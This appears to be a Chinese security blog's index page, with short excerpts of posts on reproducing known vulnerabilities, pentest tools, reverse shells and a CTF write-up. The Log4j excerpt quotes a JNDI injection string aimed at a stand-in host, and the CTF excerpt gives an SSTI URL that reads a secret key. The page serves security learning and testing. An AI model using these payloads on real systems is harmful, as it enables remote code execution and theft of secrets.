摘要:学习于:https://www.cnblogs.com/HelloCTF/p/13044403.html 序列化和反序列化的概念 序列化就是将对象转换成字符串。字符串包括、属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。对象的序列化利于对象的保存和传输,也可以让多个 阅读全文
posted @ 2022-05-16 07:59 NoCirc1e 阅读(122) 评论(0) 推荐(0) 编辑
摘要:GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 参考链接: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/https://www.lea 阅读全文
posted @ 2022-05-16 07:58 NoCirc1e 阅读(257) 评论(0) 推荐(0) 编辑
摘要:elFinder是一个基于PHP、Jquery的开源文件管理系统。 在elFinder 2.1.48及以前的版本中,存在一处参数注入漏洞。攻击者可以利用这个漏洞在目标服务器上执行任意命令,即使是最小化安装的elFinder。 这个漏洞的原因除了参数注入外,还有默认情况下的未授权访问,因此我们可以对e 阅读全文
posted @ 2022-05-16 07:57 NoCirc1e 阅读(904) 评论(0) 推荐(0) 编辑
摘要:原理 详见https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html。 测试环境搭建 直接执行docker-compose up -d即可运行测试环境,环境监听9000端口。 EXP Exp见 https://gist.github 阅读全文
posted @ 2022-05-16 07:57 NoCirc1e 阅读(388) 评论(0) 推荐(0) 编辑
摘要:Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerService 阅读全文
posted @ 2022-05-16 07:56 NoCirc1e 阅读(150) 评论(0) 推荐(0) 编辑
摘要:jre版本:openjdk:8-jre elasticsearch版本:v1.6.0 影响版本:1.6.1以下 原理 参考文章 https://www.exploit-db.com/exploits/38383/http://www.freebuf.com/vuls/99942.html 说明: e 阅读全文
posted @ 2022-05-16 07:56 NoCirc1e 阅读(214) 评论(0) 推荐(0) 编辑
摘要:学习于:https://blog.csdn.net/qq_38154820/article/details/106330032 概述 开始之前先明确什么是WebShell客户端?先问个问题,什么是客户端,什么是服务端? 很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果 阅读全文
posted @ 2022-05-16 07:55 NoCirc1e 阅读(1373) 评论(2) 推荐(1) 编辑
摘要:面向对象中的基本概念 类和对象 对象: 万物皆对象; 类: 任何对象,都可以人为“规定”为某种类型(类别); class Person{ var $name ; var $age; var $edu; } 我: 姓名:罗XX, 年龄40, 学历:大学; 王亮: 姓名:王亮 年龄:20; 学历:大学; 阅读全文
posted @ 2022-05-16 07:55 NoCirc1e 阅读(62) 评论(0) 推荐(0) 编辑
摘要:Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/tec 阅读全文
posted @ 2022-05-16 07:54 NoCirc1e 阅读(134) 评论(0) 推荐(0) 编辑
摘要:XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryIm 阅读全文
posted @ 2022-05-16 07:54 NoCirc1e 阅读(343) 评论(0) 推荐(0) 编辑
摘要:Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中,存在一处表达式注入漏洞,远程攻击者通过MVEL和OGNL表达式即可在目 阅读全文
posted @ 2022-05-16 07:53 NoCirc1e 阅读(64) 评论(0) 推荐(0) 编辑
摘要:http是超文本传输协议,信息是明文传输, https则具安全性的ssl/tls加密传输协议。 http和https使用完全不同的连接方法和不同的端口。前者是80,后者是443。http连接是非常简单和无状态的;httpS协议是由SSL/TLS+HTTP协议构建的网络协议,可用于加密传输和身份认证。 阅读全文
posted @ 2022-05-16 07:53 NoCirc1e 阅读(1005) 评论(0) 推荐(0) 编辑
摘要:什么是UDF UDF 全称为:User Defined Function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++ 阅读全文
posted @ 2022-05-16 07:52 NoCirc1e 阅读(168) 评论(0) 推荐(0) 编辑
摘要:eval()函数和system()函数的比较 eval类型函数是代码执行而不是命令执行(一句话木马) system类型函数是命令执行而不是代码执行 eval函数里必须是一个符合php语法的语句,如果语句结尾没有分号会报错:eval()'d code <?php eval("echo 1+1;"); 阅读全文
posted @ 2022-05-16 07:51 NoCirc1e 阅读(458) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.0.0 - 2.3.15 漏洞详情: http://struts.apache.org/docs/s2-016.htmlhttp://www.freebuf.com/articles/web/25337.html 测试环境搭建 docker-compose build docker- 阅读全文
posted @ 2022-05-16 07:50 NoCirc1e 阅读(362) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.1.0 - 2.3.1 漏洞详情: http://struts.apache.org/docs/s2-008.html 测试环境搭建 docker-compose build docker-compose up -d 原理 参考:http://rickgray.me/2016/05/ 阅读全文
posted @ 2022-05-16 07:50 NoCirc1e 阅读(129) 评论(0) 推荐(0) 编辑
摘要:漏洞原理与分析可以参考: https://www.exploit-db.com/exploits/43009/https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Luce 阅读全文
posted @ 2022-05-16 07:49 NoCirc1e 阅读(244) 评论(0) 推荐(0) 编辑
摘要:影响版本: 2.0.0 - 2.3.32 漏洞详情: http://struts.apache.org/docs/s2-048.htmlhttp://bobao.360.cn/learning/detail/4078.htmlhttp://xxlegend.com/2017/07/08/S2-048 阅读全文
posted @ 2022-05-16 07:49 NoCirc1e 阅读(36) 评论(0) 推荐(0) 编辑
摘要:scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:https://www.leavesongs.com/PENETRATION/attack-scra 阅读全文
posted @ 2022-05-16 07:48 NoCirc1e 阅读(202) 评论(0) 推荐(0) 编辑
摘要:Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考链接 阅读全文
posted @ 2022-05-16 07:47 NoCirc1e 阅读(391) 评论(0) 推荐(0) 编辑
摘要:GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。 这个漏洞是CVE-2017-17562漏洞补丁的绕过,攻击者可以利用该补丁没有考虑到的multipart表单控 阅读全文
posted @ 2022-05-16 07:47 NoCirc1e 阅读(424) 评论(0) 推荐(0) 编辑
摘要:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户 阅读全文
posted @ 2022-05-16 07:46 NoCirc1e 阅读(331) 评论(0) 推荐(0) 编辑
摘要:下载地址:https://github.com/chaitin/xray/releases 使用环境:Windows、Linux、macOS皆可 工具说明:Xray扫描器是一款功能强大的安全评估工具。支持主动、被动多种扫描方式,支持常见Web漏洞的自动化检测,可以灵活定义POC,功能丰富,调用简单, 阅读全文
posted @ 2022-05-16 07:45 NoCirc1e 阅读(930) 评论(0) 推荐(0) 编辑
摘要:项目地址:https://github.com/k8gege/Ladon 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.2 阅读全文
posted @ 2022-05-16 07:44 NoCirc1e 阅读(2975) 评论(1) 推荐(0) 编辑
摘要:源于:https://m.w3cschool.cn/article/24070619.html 什么是 jar 包 jar 包全称 Java Archive ,中文名叫 java 归档文件,这是一种与平台无关的文件格式,它允许将许多文件组合成一个压缩文件(是的,jar 包就是一种压缩文件,甚至 ja 阅读全文
posted @ 2022-05-16 07:43 NoCirc1e 阅读(2201) 评论(0) 推荐(0) 编辑
摘要:a、web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web b、数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 P 阅读全文
posted @ 2022-05-16 07:40 NoCirc1e 阅读(181) 评论(0) 推荐(0) 编辑
摘要:什么是反弹shell? 反弹shell(reverse shell),指的就是我们的机器监听在某TCP/UDP端口,然后在希望被我们利用的被控机器发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell其实差不多对应,本质上是网络概念的客户 阅读全文
posted @ 2022-05-16 07:38 NoCirc1e 阅读(934) 评论(0) 推荐(1) 编辑
摘要:地址:https://ctf.bugku.com/ Simple_SSTI_1 模板注入,查看页面源代码 很明显,flag在secret_key下 构建如下url:http://114.67.175.224:12784/?flag={{config.SECRET_KEY}} or在地址栏后面输入:/ 阅读全文
posted @ 2022-05-16 07:36 NoCirc1e 阅读(423) 评论(0) 推荐(0) 编辑